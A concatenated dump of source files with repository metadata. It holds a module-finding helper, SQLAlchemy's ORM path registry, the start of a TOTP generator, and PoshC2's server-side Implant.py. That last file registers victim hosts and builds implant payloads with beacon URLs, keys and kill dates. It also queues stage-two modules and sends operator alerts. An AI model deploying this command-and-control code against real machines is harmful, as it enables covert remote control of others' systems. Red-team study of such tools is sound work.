PY_COMPILED = 2
C_EXTENSION = 3
C_BUILTIN = 6
PY_FROZEN = 7
def find_spec(module, paths):
finder = (
importlib.machinery.PathFinder().find_spec
if isinstance(paths, list)
else importlib.util.find_spec
)
return finder(module, paths)
def find_module(module, paths=None):
"""Just like 'imp.find_module()', but with package support"""
spec = find_spec(module, paths)
if spec is None:
raise ImportError("Can't find %s" % module)
if not spec.has_location and hasattr(spec, 'submodule_search_locations'):
spec = importlib.util.spec_from_loader('__init__.py', spec.loader)
kind = -1
file = None
static = isinstance(spec.loader, type)
if (
spec.origin == 'frozen'
or static
and issubclass(spec.loader, importlib.machinery.FrozenImporter)
):
kind = PY_FROZEN
path = None # imp compabilty
suffix = mode = '' # imp compatibility
elif (
spec.origin == 'built-in'
or static
and issubclass(spec.loader, importlib.machinery.BuiltinImporter)
):
kind = C_BUILTIN
path = None # imp compabilty
suffix = mode = '' # imp compatibility
elif spec.has_location:
path = spec.origin
suffix = os.path.splitext(path)[1]
mode = 'r' if suffix in importlib.machinery.SOURCE_SUFFIXES else 'rb'
if suffix in importlib.machinery.SOURCE_SUFFIXES:
kind = PY_SOURCE
elif suffix in importlib.machinery.BYTECODE_SUFFIXES:
kind = PY_COMPILED
elif suffix in importlib.machinery.EXTENSION_SUFFIXES:
kind = C_EXTENSION
if kind in {PY_SOURCE, PY_COMPILED}:
file = open(path, mode)
else:
path = None
suffix = mode = ''
return file, path, (suffix, mode, kind)
def get_frozen_object(module, paths=None):
spec = find_spec(module, paths)
if not spec:
raise ImportError("Can't find %s" % module)
return spec.loader.get_code(module)
def get_module(module, paths, info):
spec = find_spec(module, paths)
if not spec:
raise ImportError("Can't find %s" % module)
return module_from_spec(spec)
|
073465b149e7b250e34f802ba30c3bbff8db5406
|
0ca218c0f54dac33a2ade4accfdf8f5be3207588
|
/lib/sqlalchemy/orm/path_registry.py
|
2cd8a1412c4d2e1b91b913970088b8e839b0e702
|
[
"MIT"
] |
permissive
|
sqlalchemy/sqlalchemy
|
9d949c67c9b5396b1f33e7ff0f3230c81babf5be
|
b382bff6e3464f039db0fd1f2ce1b79038675e48
|
refs/heads/main
| 2023-08-31T17:40:59.565421
| 2023-08-30T15:01:41
| 2023-08-30T15:01:41
| 159,271,175
| 8,083
| 1,489
|
MIT
| 2023-09-12T18:53:55
| 2018-11-27T03:35:03
|
Python
|
UTF-8
|
Python
| false
| false
| 25,626
|
py
|
path_registry.py
|
# orm/path_registry.py
# Copyright (C) 2005-2023 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Path tracking utilities, representing mapper graph traversals.
"""
from __future__ import annotations
from functools import reduce
from itertools import chain
import logging
import operator
from typing import Any
from typing import cast
from typing import Dict
from typing import Iterator
from typing import List
from typing import Optional
from typing import overload
from typing import Sequence
from typing import Tuple
from typing import TYPE_CHECKING
from typing import Union
from . import base as orm_base
from ._typing import insp_is_mapper_property
from .. import exc
from .. import util
from ..sql import visitors
from ..sql.cache_key import HasCacheKey
if TYPE_CHECKING:
from ._typing import _InternalEntityType
from .interfaces import MapperProperty
from .mapper import Mapper
from .relationships import RelationshipProperty
from .util import AliasedInsp
from ..sql.cache_key import _CacheKeyTraversalType
from ..sql.elements import BindParameter
from ..sql.visitors import anon_map
from ..util.typing import _LiteralStar
from ..util.typing import TypeGuard
def is_root(path: PathRegistry) -> TypeGuard[RootRegistry]:
...
def is_entity(path: PathRegistry) -> TypeGuard[AbstractEntityRegistry]:
...
else:
is_root = operator.attrgetter("is_root")
is_entity = operator.attrgetter("is_entity")
_SerializedPath = List[Any]
_PathElementType = Union[
str, "_InternalEntityType[Any]", "MapperProperty[Any]"
]
# the representation is in fact
# a tuple with alternating:
# [_InternalEntityType[Any], Union[str, MapperProperty[Any]],
# _InternalEntityType[Any], Union[str, MapperProperty[Any]], ...]
# this might someday be a tuple of 2-tuples instead, but paths can be
# chopped at odd intervals as well so this is less flexible
_PathRepresentation = Tuple[_PathElementType, ...]
_OddPathRepresentation = Sequence["_InternalEntityType[Any]"]
_EvenPathRepresentation = Sequence[Union["MapperProperty[Any]", str]]
log = logging.getLogger(__name__)
def _unreduce_path(path: _SerializedPath) -> PathRegistry:
return PathRegistry.deserialize(path)
_WILDCARD_TOKEN: _LiteralStar = "*"
_DEFAULT_TOKEN = "_sa_default"
class PathRegistry(HasCacheKey):
"""Represent query load paths and registry functions.
Basically represents structures like:
(<User mapper>, "orders", <Order mapper>, "items", <Item mapper>)
These structures are generated by things like
query options (joinedload(), subqueryload(), etc.) and are
used to compose keys stored in the query._attributes dictionary
for various options.
They are then re-composed at query compile/result row time as
the query is formed and as rows are fetched, where they again
serve to compose keys to look up options in the context.attributes
dictionary, which is copied from query._attributes.
The path structure has a limited amount of caching, where each
"root" ultimately pulls from a fixed registry associated with
the first mapper, that also contains elements for each of its
property keys. However paths longer than two elements, which
are the exception rather than the rule, are generated on an
as-needed basis.
"""
__slots__ = ()
is_token = False
is_root = False
has_entity = False
is_property = False
is_entity = False
is_unnatural: bool
path: _PathRepresentation
natural_path: _PathRepresentation
parent: Optional[PathRegistry]
root: RootRegistry
_cache_key_traversal: _CacheKeyTraversalType = [
("path", visitors.ExtendedInternalTraversal.dp_has_cache_key_list)
]
def __eq__(self, other: Any) -> bool:
try:
return other is not None and self.path == other._path_for_compare
except AttributeError:
util.warn(
"Comparison of PathRegistry to %r is not supported"
% (type(other))
)
return False
def __ne__(self, other: Any) -> bool:
try:
return other is None or self.path != other._path_for_compare
except AttributeError:
util.warn(
"Comparison of PathRegistry to %r is not supported"
% (type(other))
)
return True
@property
def _path_for_compare(self) -> Optional[_PathRepresentation]:
return self.path
def set(self, attributes: Dict[Any, Any], key: Any, value: Any) -> None:
log.debug("set '%s' on path '%s' to '%s'", key, self, value)
attributes[(key, self.natural_path)] = value
def setdefault(
self, attributes: Dict[Any, Any], key: Any, value: Any
) -> None:
log.debug("setdefault '%s' on path '%s' to '%s'", key, self, value)
attributes.setdefault((key, self.natural_path), value)
def get(
self, attributes: Dict[Any, Any], key: Any, value: Optional[Any] = None
) -> Any:
key = (key, self.natural_path)
if key in attributes:
return attributes[key]
else:
return value
def __len__(self) -> int:
return len(self.path)
def __hash__(self) -> int:
return id(self)
@overload
def __getitem__(self, entity: str) -> TokenRegistry:
...
@overload
def __getitem__(self, entity: int) -> _PathElementType:
...
@overload
def __getitem__(self, entity: slice) -> _PathRepresentation:
...
@overload
def __getitem__(
self, entity: _InternalEntityType[Any]
) -> AbstractEntityRegistry:
...
@overload
def __getitem__(self, entity: MapperProperty[Any]) -> PropRegistry:
...
def __getitem__(
self,
entity: Union[
str, int, slice, _InternalEntityType[Any], MapperProperty[Any]
],
) -> Union[
TokenRegistry,
_PathElementType,
_PathRepresentation,
PropRegistry,
AbstractEntityRegistry,
]:
raise NotImplementedError()
# TODO: what are we using this for?
@property
def length(self) -> int:
return len(self.path)
def pairs(
self,
) -> Iterator[
Tuple[_InternalEntityType[Any], Union[str, MapperProperty[Any]]]
]:
odd_path = cast(_OddPathRepresentation, self.path)
even_path = cast(_EvenPathRepresentation, odd_path)
for i in range(0, len(odd_path), 2):
yield odd_path[i], even_path[i + 1]
def contains_mapper(self, mapper: Mapper[Any]) -> bool:
_m_path = cast(_OddPathRepresentation, self.path)
for path_mapper in [_m_path[i] for i in range(0, len(_m_path), 2)]:
if path_mapper.mapper.isa(mapper):
return True
else:
return False
def contains(self, attributes: Dict[Any, Any], key: Any) -> bool:
return (key, self.path) in attributes
def __reduce__(self) -> Any:
return _unreduce_path, (self.serialize(),)
@classmethod
def _serialize_path(cls, path: _PathRepresentation) -> _SerializedPath:
_m_path = cast(_OddPathRepresentation, path)
_p_path = cast(_EvenPathRepresentation, path)
return list(
zip(
tuple(
m.class_ if (m.is_mapper or m.is_aliased_class) else str(m)
for m in [_m_path[i] for i in range(0, len(_m_path), 2)]
),
tuple(
p.key if insp_is_mapper_property(p) else str(p)
for p in [_p_path[i] for i in range(1, len(_p_path), 2)]
)
+ (None,),
)
)
@classmethod
def _deserialize_path(cls, path: _SerializedPath) -> _PathRepresentation:
def _deserialize_mapper_token(mcls: Any) -> Any:
return (
# note: we likely dont want configure=True here however
# this is maintained at the moment for backwards compatibility
orm_base._inspect_mapped_class(mcls, configure=True)
if mcls not in PathToken._intern
else PathToken._intern[mcls]
)
def _deserialize_key_token(mcls: Any, key: Any) -> Any:
if key is None:
return None
elif key in PathToken._intern:
return PathToken._intern[key]
else:
mp = orm_base._inspect_mapped_class(mcls, configure=True)
assert mp is not None
return mp.attrs[key]
p = tuple(
chain(
*[
(
_deserialize_mapper_token(mcls),
_deserialize_key_token(mcls, key),
)
for mcls, key in path
]
)
)
if p and p[-1] is None:
p = p[0:-1]
return p
def serialize(self) -> _SerializedPath:
path = self.path
return self._serialize_path(path)
@classmethod
def deserialize(cls, path: _SerializedPath) -> PathRegistry:
assert path is not None
p = cls._deserialize_path(path)
return cls.coerce(p)
@overload
@classmethod
def per_mapper(cls, mapper: Mapper[Any]) -> CachingEntityRegistry:
...
@overload
@classmethod
def per_mapper(cls, mapper: AliasedInsp[Any]) -> SlotsEntityRegistry:
...
@classmethod
def per_mapper(
cls, mapper: _InternalEntityType[Any]
) -> AbstractEntityRegistry:
if mapper.is_mapper:
return CachingEntityRegistry(cls.root, mapper)
else:
return SlotsEntityRegistry(cls.root, mapper)
@classmethod
def coerce(cls, raw: _PathRepresentation) -> PathRegistry:
def _red(prev: PathRegistry, next_: _PathElementType) -> PathRegistry:
return prev[next_]
# can't quite get mypy to appreciate this one :)
return reduce(_red, raw, cls.root) # type: ignore
def __add__(self, other: PathRegistry) -> PathRegistry:
def _red(prev: PathRegistry, next_: _PathElementType) -> PathRegistry:
return prev[next_]
return reduce(_red, other.path, self)
def __str__(self) -> str:
return f"ORM Path[{' -> '.join(str(elem) for elem in self.path)}]"
def __repr__(self) -> str:
return f"{self.__class__.__name__}({self.path!r})"
class CreatesToken(PathRegistry):
__slots__ = ()
is_aliased_class: bool
is_root: bool
def token(self, token: str) -> TokenRegistry:
if token.endswith(f":{_WILDCARD_TOKEN}"):
return TokenRegistry(self, token)
elif token.endswith(f":{_DEFAULT_TOKEN}"):
return TokenRegistry(self.root, token)
else:
raise exc.ArgumentError(f"invalid token: {token}")
class RootRegistry(CreatesToken):
"""Root registry, defers to mappers so that
paths are maintained per-root-mapper.
"""
__slots__ = ()
inherit_cache = True
path = natural_path = ()
has_entity = False
is_aliased_class = False
is_root = True
is_unnatural = False
def _getitem(
self, entity: Any
) -> Union[TokenRegistry, AbstractEntityRegistry]:
if entity in PathToken._intern:
if TYPE_CHECKING:
assert isinstance(entity, str)
return TokenRegistry(self, PathToken._intern[entity])
else:
try:
return entity._path_registry # type: ignore
except AttributeError:
raise IndexError(
f"invalid argument for RootRegistry.__getitem__: {entity}"
)
def _truncate_recursive(self) -> RootRegistry:
return self
if not TYPE_CHECKING:
__getitem__ = _getitem
PathRegistry.root = RootRegistry()
class PathToken(orm_base.InspectionAttr, HasCacheKey, str):
"""cacheable string token"""
_intern: Dict[str, PathToken] = {}
def _gen_cache_key(
self, anon_map: anon_map, bindparams: List[BindParameter[Any]]
) -> Tuple[Any, ...]:
return (str(self),)
@property
def _path_for_compare(self) -> Optional[_PathRepresentation]:
return None
@classmethod
def intern(cls, strvalue: str) -> PathToken:
if strvalue in cls._intern:
return cls._intern[strvalue]
else:
cls._intern[strvalue] = result = PathToken(strvalue)
return result
class TokenRegistry(PathRegistry):
__slots__ = ("token", "parent", "path", "natural_path")
inherit_cache = True
token: str
parent: CreatesToken
def __init__(self, parent: CreatesToken, token: str):
token = PathToken.intern(token)
self.token = token
self.parent = parent
self.path = parent.path + (token,)
self.natural_path = parent.natural_path + (token,)
has_entity = False
is_token = True
def generate_for_superclasses(self) -> Iterator[PathRegistry]:
# NOTE: this method is no longer used. consider removal
parent = self.parent
if is_root(parent):
yield self
return
if TYPE_CHECKING:
assert isinstance(parent, AbstractEntityRegistry)
if not parent.is_aliased_class:
for mp_ent in parent.mapper.iterate_to_root():
yield TokenRegistry(parent.parent[mp_ent], self.token)
elif (
parent.is_aliased_class
and cast(
"AliasedInsp[Any]",
parent.entity,
)._is_with_polymorphic
):
yield self
for ent in cast(
"AliasedInsp[Any]", parent.entity
)._with_polymorphic_entities:
yield TokenRegistry(parent.parent[ent], self.token)
else:
yield self
def _generate_natural_for_superclasses(
self,
) -> Iterator[_PathRepresentation]:
parent = self.parent
if is_root(parent):
yield self.natural_path
return
if TYPE_CHECKING:
assert isinstance(parent, AbstractEntityRegistry)
for mp_ent in parent.mapper.iterate_to_root():
yield TokenRegistry(parent.parent[mp_ent], self.token).natural_path
if (
parent.is_aliased_class
and cast(
"AliasedInsp[Any]",
parent.entity,
)._is_with_polymorphic
):
yield self.natural_path
for ent in cast(
"AliasedInsp[Any]", parent.entity
)._with_polymorphic_entities:
yield (
TokenRegistry(parent.parent[ent], self.token).natural_path
)
else:
yield self.natural_path
def _getitem(self, entity: Any) -> Any:
try:
return self.path[entity]
except TypeError as err:
raise IndexError(f"{entity}") from err
if not TYPE_CHECKING:
__getitem__ = _getitem
class PropRegistry(PathRegistry):
__slots__ = (
"prop",
"parent",
"path",
"natural_path",
"has_entity",
"entity",
"mapper",
"_wildcard_path_loader_key",
"_default_path_loader_key",
"_loader_key",
"is_unnatural",
)
inherit_cache = True
is_property = True
prop: MapperProperty[Any]
mapper: Optional[Mapper[Any]]
entity: Optional[_InternalEntityType[Any]]
def __init__(
self, parent: AbstractEntityRegistry, prop: MapperProperty[Any]
):
# restate this path in terms of the
# given MapperProperty's parent.
insp = cast("_InternalEntityType[Any]", parent[-1])
natural_parent: AbstractEntityRegistry = parent
# inherit "is_unnatural" from the parent
self.is_unnatural = parent.parent.is_unnatural or bool(
parent.mapper.inherits
)
if not insp.is_aliased_class or insp._use_mapper_path: # type: ignore
parent = natural_parent = parent.parent[prop.parent]
elif (
insp.is_aliased_class
and insp.with_polymorphic_mappers
and prop.parent in insp.with_polymorphic_mappers
):
subclass_entity: _InternalEntityType[Any] = parent[-1]._entity_for_mapper(prop.parent) # type: ignore # noqa: E501
parent = parent.parent[subclass_entity]
# when building a path where with_polymorphic() is in use,
# special logic to determine the "natural path" when subclass
# entities are used.
#
# here we are trying to distinguish between a path that starts
# on a the with_polymorhpic entity vs. one that starts on a
# normal entity that introduces a with_polymorphic() in the
# middle using of_type():
#
# # as in test_polymorphic_rel->
# # test_subqueryload_on_subclass_uses_path_correctly
# wp = with_polymorphic(RegularEntity, "*")
# sess.query(wp).options(someload(wp.SomeSubEntity.foos))
#
# vs
#
# # as in test_relationship->JoinedloadWPolyOfTypeContinued
# wp = with_polymorphic(SomeFoo, "*")
# sess.query(RegularEntity).options(
# someload(RegularEntity.foos.of_type(wp))
# .someload(wp.SubFoo.bar)
# )
#
# in the former case, the Query as it generates a path that we
# want to match will be in terms of the with_polymorphic at the
# beginning. in the latter case, Query will generate simple
# paths that don't know about this with_polymorphic, so we must
# use a separate natural path.
#
#
if parent.parent:
natural_parent = parent.parent[subclass_entity.mapper]
self.is_unnatural = True
else:
natural_parent = parent
elif (
natural_parent.parent
and insp.is_aliased_class
and prop.parent # this should always be the case here
is not insp.mapper
and insp.mapper.isa(prop.parent)
):
natural_parent = parent.parent[prop.parent]
self.prop = prop
self.parent = parent
self.path = parent.path + (prop,)
self.natural_path = natural_parent.natural_path + (prop,)
self.has_entity = prop._links_to_entity
if prop._is_relationship:
if TYPE_CHECKING:
assert isinstance(prop, RelationshipProperty)
self.entity = prop.entity
self.mapper = prop.mapper
else:
self.entity = None
self.mapper = None
self._wildcard_path_loader_key = (
"loader",
parent.natural_path + self.prop._wildcard_token, # type: ignore
)
self._default_path_loader_key = self.prop._default_path_loader_key
self._loader_key = ("loader", self.natural_path)
def _truncate_recursive(self) -> PropRegistry:
earliest = None
for i, token in enumerate(reversed(self.path[:-1])):
if token is self.prop:
earliest = i
if earliest is None:
return self
else:
return self.coerce(self.path[0 : -(earliest + 1)]) # type: ignore
@property
def entity_path(self) -> AbstractEntityRegistry:
assert self.entity is not None
return self[self.entity]
def _getitem(
self, entity: Union[int, slice, _InternalEntityType[Any]]
) -> Union[AbstractEntityRegistry, _PathElementType, _PathRepresentation]:
if isinstance(entity, (int, slice)):
return self.path[entity]
else:
return SlotsEntityRegistry(self, entity)
if not TYPE_CHECKING:
__getitem__ = _getitem
class AbstractEntityRegistry(CreatesToken):
__slots__ = (
"key",
"parent",
"is_aliased_class",
"path",
"entity",
"natural_path",
)
has_entity = True
is_entity = True
parent: Union[RootRegistry, PropRegistry]
key: _InternalEntityType[Any]
entity: _InternalEntityType[Any]
is_aliased_class: bool
def __init__(
self,
parent: Union[RootRegistry, PropRegistry],
entity: _InternalEntityType[Any],
):
self.key = entity
self.parent = parent
self.is_aliased_class = entity.is_aliased_class
self.entity = entity
self.path = parent.path + (entity,)
# the "natural path" is the path that we get when Query is traversing
# from the lead entities into the various relationships; it corresponds
# to the structure of mappers and relationships. when we are given a
# path that comes from loader options, as of 1.3 it can have ac-hoc
# with_polymorphic() and other AliasedInsp objects inside of it, which
# are usually not present in mappings. So here we track both the
# "enhanced" path in self.path and the "natural" path that doesn't
# include those objects so these two traversals can be matched up.
# the test here for "(self.is_aliased_class or parent.is_unnatural)"
# are to avoid the more expensive conditional logic that follows if we
# know we don't have to do it. This conditional can just as well be
# "if parent.path:", it just is more function calls.
#
# This is basically the only place that the "is_unnatural" flag
# actually changes behavior.
if parent.path and (self.is_aliased_class or parent.is_unnatural):
# this is an infrequent code path used only for loader strategies
# that also make use of of_type().
if entity.mapper.isa(parent.natural_path[-1].mapper): # type: ignore # noqa: E501
self.natural_path = parent.natural_path + (entity.mapper,)
else:
self.natural_path = parent.natural_path + (
parent.natural_path[-1].entity, # type: ignore
)
# it seems to make sense that since these paths get mixed up
# with statements that are cached or not, we should make
# sure the natural path is cacheable across different occurrences
# of equivalent AliasedClass objects. however, so far this
# does not seem to be needed for whatever reason.
# elif not parent.path and self.is_aliased_class:
# self.natural_path = (self.entity._generate_cache_key()[0], )
else:
self.natural_path = self.path
def _truncate_recursive(self) -> AbstractEntityRegistry:
return self.parent._truncate_recursive()[self.entity]
@property
def root_entity(self) -> _InternalEntityType[Any]:
return cast("_InternalEntityType[Any]", self.path[0])
@property
def entity_path(self) -> PathRegistry:
return self
@property
def mapper(self) -> Mapper[Any]:
return self.entity.mapper
def __bool__(self) -> bool:
return True
def _getitem(
self, entity: Any
) -> Union[_PathElementType, _PathRepresentation, PathRegistry]:
if isinstance(entity, (int, slice)):
return self.path[entity]
elif entity in PathToken._intern:
return TokenRegistry(self, PathToken._intern[entity])
else:
return PropRegistry(self, entity)
if not TYPE_CHECKING:
__getitem__ = _getitem
class SlotsEntityRegistry(AbstractEntityRegistry):
# for aliased class, return lightweight, no-cycles created
# version
inherit_cache = True
class _ERDict(Dict[Any, Any]):
def __init__(self, registry: CachingEntityRegistry):
self.registry = registry
def __missing__(self, key: Any) -> PropRegistry:
self[key] = item = PropRegistry(self.registry, key)
return item
class CachingEntityRegistry(AbstractEntityRegistry):
# for long lived mapper, return dict based caching
# version that creates reference cycles
__slots__ = ("_cache",)
inherit_cache = True
def __init__(
self,
parent: Union[RootRegistry, PropRegistry],
entity: _InternalEntityType[Any],
):
super().__init__(parent, entity)
self._cache = _ERDict(self)
def pop(self, key: Any, default: Any) -> Any:
return self._cache.pop(key, default)
def _getitem(self, entity: Any) -> Any:
if isinstance(entity, (int, slice)):
return self.path[entity]
elif isinstance(entity, PathToken):
return TokenRegistry(self, entity)
else:
return self._cache[entity]
if not TYPE_CHECKING:
__getitem__ = _getitem
if TYPE_CHECKING:
def path_is_entity(
path: PathRegistry,
) -> TypeGuard[AbstractEntityRegistry]:
...
def path_is_property(path: PathRegistry) -> TypeGuard[PropRegistry]:
...
else:
path_is_entity = operator.attrgetter("is_entity")
path_is_property = operator.attrgetter("is_property")
|
5454f5d95b96a153c06f3ceca1907231ff22cb58
|
3e00405025535eb1a1829b70f9e984ea9bb76fc5
|
/poshc2/server/Implant.py
|
582470e0581f110afa12b67326bc9ad93e8a57d9
|
[
"BSD-3-Clause"
] |
permissive
|
nettitude/PoshC2
|
5d1fdfbd53ee82e6fb145bde5cbb1afc6b2067ed
|
517903431ab43e6d714b24b0752ba111f5d4c2f1
|
refs/heads/master
| 2023-08-24T17:45:43.198409
| 2022-07-12T11:12:28
| 2022-08-01T09:09:15
| 141,987,967
| 1,378
| 299
|
BSD-3-Clause
| 2023-07-23T22:14:04
| 2018-07-23T08:53:32
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 8,606
|
py
|
Implant.py
|
import urllib, base64, http.client, re
from datetime import datetime, timezone
from poshc2.Colours import Colours
from poshc2.Utils import randomuri, gen_key
from poshc2.server.Config import PayloadsDirectory, PayloadTemplatesDirectory, Jitter, NotificationsProjectName
from poshc2.server.Core import get_images
from poshc2.server.AutoLoads import run_autoloads
from poshc2.server.database.DB import select_item, get_defaultbeacon, get_killdate, get_dfheader, get_otherbeaconurls, update_label
from poshc2.server.database.DB import get_defaultuseragent, new_implant, new_task, update_mods, get_autoruns, get_notificationstatus, get_url_by_id
class Implant(object):
def __init__(self, ipaddress, pivot, domain, user, hostname, arch, pid, procname, URLID):
self.RandomURI = randomuri()
self.URLID = URLID,
self.Label = None
self.User = user
self.Hostname = hostname
self.IPAddress = ipaddress
self.Key = gen_key().decode("utf-8")
self.FirstSeen = (datetime.now(timezone.utc)).strftime("%Y-%m-%d %H:%M:%S")
self.LastSeen = (datetime.now(timezone.utc)).strftime("%Y-%m-%d %H:%M:%S")
self.PID = pid
self.ProcName = procname
self.Arch = arch
self.Domain = domain
self.DomainFrontHeader = get_dfheader()
self.Alive = "Yes"
self.UserAgent = get_defaultuseragent()
self.Sleep = get_defaultbeacon()
self.ModsLoaded = ""
self.Jitter = Jitter
self.ImplantID = ""
self.Pivot = pivot
self.KillDate = get_killdate()
self.ServerURL = select_item("PayloadCommsHost", "C2Server")
self.AllBeaconURLs = get_otherbeaconurls()
self.AllBeaconImages = get_images()
self.SharpCore = """
RANDOMURI19901%s10991IRUMODNAR
URLS10484390243%s34209348401SLRU
KILLDATE1665%s5661ETADLLIK
SLEEP98001%s10089PEELS
JITTER2025%s5202RETTIJ
NEWKEY8839394%s4939388YEKWEN
IMGS19459394%s49395491SGMI""" % (self.RandomURI, self.AllBeaconURLs, self.KillDate, self.Sleep, self.Jitter, self.Key, self.AllBeaconImages)
with open("%spy_dropper.sh" % (PayloadsDirectory), 'rb') as f:
self.PythonImplant = base64.b64encode(f.read()).decode("utf-8")
py_implant_core = open("%s/Implant-Core.py" % PayloadTemplatesDirectory, 'r').read()
self.PythonCore = py_implant_core % (self.DomainFrontHeader, self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Jitter, self.Key, self.RandomURI, self.UserAgent)
with open('/tmp/pythoncore.py', 'w') as output:
output.write(self.PythonCore)
ps_implant_core = open("%s/Implant-Core.ps1" % PayloadTemplatesDirectory, 'r').read()
self.PSCore = ps_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs) # Add all db elements def display(self):
jxa_implant_core = open("%s/Implant-Core.js" % PayloadTemplatesDirectory, 'r').read()
self.JXACore = jxa_implant_core % (self.Key, self.Jitter, self.Sleep, self.AllBeaconImages, self.RandomURI, self.ServerURL, self.KillDate, self.AllBeaconURLs)
self.NativeCore = open("%s/stage2core.so" % PayloadTemplatesDirectory, 'rb').read().replace(b"RANDOMURI199011", self.RandomURI.encode('utf-8')).replace(b"RANDOMKEYDATAWENEEDTOFILLINLATERWITHSOMETHIN", self.Key.encode('utf-8'))
# Add all db elements
def display(self):
print(Colours.GREEN, "")
it = self.Pivot
if "pbind" in it.lower():
urlInfo = "PBind"
if "fcomm" in it.lower():
urlInfo = "FComm"
else:
urlInfo = get_url_by_id(self.URLID[0])
if urlInfo is not None:
urlInfo = f"URL: {urlInfo[1]}"
else:
urlInfo = "URL: Unknown"
print("[%s] New %s implant connected: (uri=%s key=%s)" % (self.ImplantID, it, self.RandomURI, self.Key))
print("%s | Time:%s | PID:%s | Process:%s | Sleep:%s | %s (%s) | %s" % (self.IPAddress, self.FirstSeen, str(self.PID), str(self.ProcName), str(self.Sleep), (str(self.User) + " @ " + str(self.Hostname)), self.Arch, urlInfo))
EnableNotifications = get_notificationstatus()
try:
Pushover_APIToken = select_item("Pushover_APIToken", "C2Server")
Pushover_APIUser = select_item("Pushover_APIUser", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Pushover_APIToken:
conn = http.client.HTTPSConnection("api.pushover.net:443")
conn.request("POST", "/1/messages.json",
urllib.parse.urlencode({
"token": Pushover_APIToken,
"user": Pushover_APIUser,
"message": "[%s] - New Implant: %s @ %s" % (NotificationsProjectName, self.User, self.Hostname),
}), {"Content-type": "application/x-www-form-urlencoded"})
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("\nPushover error: ")
print(data)
except Exception as e:
print("Pushover send error: %s" % e)
try:
Slack_BotToken = select_item("Slack_BotToken", "C2Server")
if EnableNotifications.lower().strip() == "yes" and Slack_BotToken:
mention_userid = select_item("Slack_UserID", "C2Server")
channel = select_item("Slack_Channel", "C2Server")
Slack_BotToken = str("Bearer ")+Slack_BotToken
if mention_userid in ("", None):
mention_userid = ""
elif mention_userid.lower().strip() == "channel":
mention_userid = "<!channel> "
else:
mention_userid = "<@%s> " % str(mention_userid)
message = {"channel": channel, "text": "%s[%s] - New Implant: %s @ %s" % (mention_userid, NotificationsProjectName, self.User, self.Hostname), "as_user": "true", "link_names": "true"}
headers = {"Content-type": "application/json","Authorization": Slack_BotToken }
conn = http.client.HTTPSConnection("slack.com:443")
conn.request("POST", "/api/chat.postMessage",json.dumps(message), headers)
output = conn.getresponse()
if output.status != 200:
data = output.read()
print("Slack error: ")
print(data)
except Exception as e:
print("Slack send error: %s" % e)
def save(self):
self.ImplantID = new_implant(self.RandomURI, self.URLID[0], self.User, self.Hostname, self.IPAddress, self.Key, self.FirstSeen, self.FirstSeen, self.PID, self.ProcName, self.Arch, self.Domain, self.Alive, self.Sleep, self.ModsLoaded, self.Pivot, self.Label)
def autoruns(self):
if "C#" in self.Pivot:
new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
new_task("loadmodule PwrStatusTracker.dll", "autoruns", self.RandomURI)
new_task("loadpowerstatus", "autoruns", self.RandomURI)
update_mods("Stage2-Core.exe PwrStatusTracker.dll", self.RandomURI)
update_label("PSM", self.RandomURI)
if "PS" in self.Pivot:
new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
update_mods("Stage2-Core.ps1", self.RandomURI)
if "PBind Pivot" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
elif "PB" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
if "FC" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
update_mods("Stage2-Core.exe", self.RandomURI)
result = get_autoruns()
if result:
for autorun in result:
run_autoloads(autorun[1], self.RandomURI, "autoruns")
new_task(autorun[1], "autoruns", self.RandomURI)
|
b195a56d55fd82ce128d21e28c54886add6f88c7
|
4f14b1901d909b0b917d35815e7b19233692f25b
|
/time-based-one-time-password-tools/totp.py
|
f61eb9c60cc39fbd3bc31d912a043488fb06e2fa
|
[] |
no_license
|
nayuki/Nayuki-web-published-code
|
e61a761e5c188aeacd35e5c8ddd005460545c94e
|
49414617b088ec4c4e339a6c1caa7ec0f40eb58f
|
refs/heads/master
| 2023-08-24T10:54:42.862243
| 2023-03-14T05:29:56
| 2023-03-14T05:29:56
| 25,706,873
| 133
| 53
| null | 2017-02-20T08:39:16
| 2014-10-24T20:33:24
|
Java
|
UTF-8
|
Python
| false
| false
| 4,860
|
py
|
totp.py
|
#
# Time-based One-Time Password tools (Python)
#
# Copyright (c) 2020 Project Nayuki. (MIT License)
# https://www.nayuki.io/page/time-based-one-time-password-tools
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
# - The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# - The Software is provided "as is", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall the
# authors or copyright holders be liable for any claim, damages or other
# liability, whether in an action of contract, tort or otherwise, arising from,
# out of or in connection with the Software or the use or other dealings in the
# Software.
#
import base64, hashlib, hmac, time, struct, sys, unittest
from typing import List, Optional, Tuple, Union
# ---- Library functions ----
# Time-based One-Time Password algorithm (RFC 6238)
def calc_totp(
secretkey: bytes,
epoch: int = 0,
timestep: int = 30,
timestamp: Optional[int] = None,
codelen: int = 6,
hashfunc = hashlib.sha1,
) -> str:
if timestamp is None:
timestamp = int(time.time())
# Check arguments
assert isinstance(epoch , int)
assert isinstance(timestep , int)
assert isinstance(timestamp, int)
# Calculate HOTP
timecounter: int = (timestamp - epoch) // timestep
